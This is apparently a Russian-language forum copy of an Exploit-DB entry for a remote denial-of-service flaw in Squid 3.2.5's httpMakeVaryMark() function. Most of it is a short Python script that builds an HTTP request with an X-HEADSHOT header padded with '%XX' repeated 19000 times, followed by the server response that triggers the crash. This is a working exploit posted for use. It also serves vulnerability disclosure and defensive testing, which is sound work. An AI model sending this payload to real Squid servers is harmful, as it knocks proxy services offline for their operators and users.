- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38365
- Проверка EDB
-
- Пройдено
- Автор
- TYTUSROMEKIATOMEK
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2013-03-05
Squid - 'httpMakeVaryMark()' Remote Denial of Service
Код:
source: https://www.securityfocus.com/bid/58319/info
Squid is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
Squid 3.2.5 is vulnerable; other versions may also be affected.
Request
-- cut --
#!/usr/bin/env python
print 'GET /index.html HTTP/1.1'
print 'Host: localhost'
print 'X-HEADSHOT: ' + '%XX' * 19000
print '\r\n\r\n'
-- cut --
Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --- Источник
- www.exploit-db.com
